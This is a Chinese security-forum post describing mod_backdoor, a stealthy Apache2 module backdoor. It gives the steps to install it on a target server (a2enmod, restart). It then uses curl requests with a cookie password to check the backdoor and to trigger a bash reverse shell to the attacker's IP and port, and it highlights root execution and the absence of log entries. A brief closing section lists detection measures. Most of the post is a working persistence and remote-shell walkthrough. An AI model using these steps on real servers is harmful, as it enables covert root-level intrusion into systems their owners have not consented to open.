安全矩阵

 找回密码
 立即注册
搜索
查看: 3911|回复: 0

Apache2之隐形后门

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-9-22 21:14:02 | 显示全部楼层 |阅读模式
原文链接:Apache2之隐形后门

0x00:简介

    mod_backdoor是使用Apache2模块的隐形后门。
    主要思路是在Apache2进程加载其配置后对其进行fork()处理。由于它是在root用户将进程转移到www-data之前创建的,因此您可以root身份执行命令。
    由于Apache2仅在(重新)启动时才加载其配置,因此面临的难度是防止apache2进程挂掉,因此来到达维持权限的目的!!!
    当攻击者在目标服务器植入后门以后 , 一旦攻击者向服务器发送的HTTP请求存在 Backdoor这个请求头 , Backdoor 这个请求头的值作为命令执行。


0x01:过程

    1、环境部署
靶机:apache  kali  172.20.10.3
攻击:mac  172.20.10.11
采用github现有的项目:
  1. https://github.com/VladRico/apache2_BackdoorMod
复制代码



    将两个文件分别放入apache对应的目录位置
    将mod_backdoor.so文件复制到 /usr/lib/apache2/modules/目录下

    将backdoor.load文件复制到 /etc/apache2/mods-available/目录下

靶机执行命令:
命令一:a2enmod backdoor
命令二:systemctl restart apache2
执行完以上两个命令后让后门模块生效
2、后门测试
mac 攻击

  1. curl -H 'Cookie: password=backdoor' http://172.20.10.3:8080/ping
复制代码

显示"后门模块正在运行"
用攻击者电脑启动NC监听
接着执行
  1. curl -H 'Cookie: password=backdoor' http://172.20.10.3:8080/reverse/172.20.10.11/1337/bash
复制代码

反弹shell

命令解析:/reverse/172.20.10.11/1337/bash
172.20.10.11:shell接收IP
1337:shell接收端口
bash:shell反弹方式
​​
  1. 回显:Sending Reverse Shell to 172.20.10.11:1337 using bash
复制代码

shell反弹成功



    优势:在于日志不会记录每个包含此cookie的请求!!!!

0x02:防范
1、检查以下目录是否存在异常模块。
  1. /etc/apache2/mods-available/
  2. /usr/lib/apache2/modules/
复制代码
2、定时重启服务器。
3、部署其他流量捕获的设备











回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 16:18 , Processed in 0.014169 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表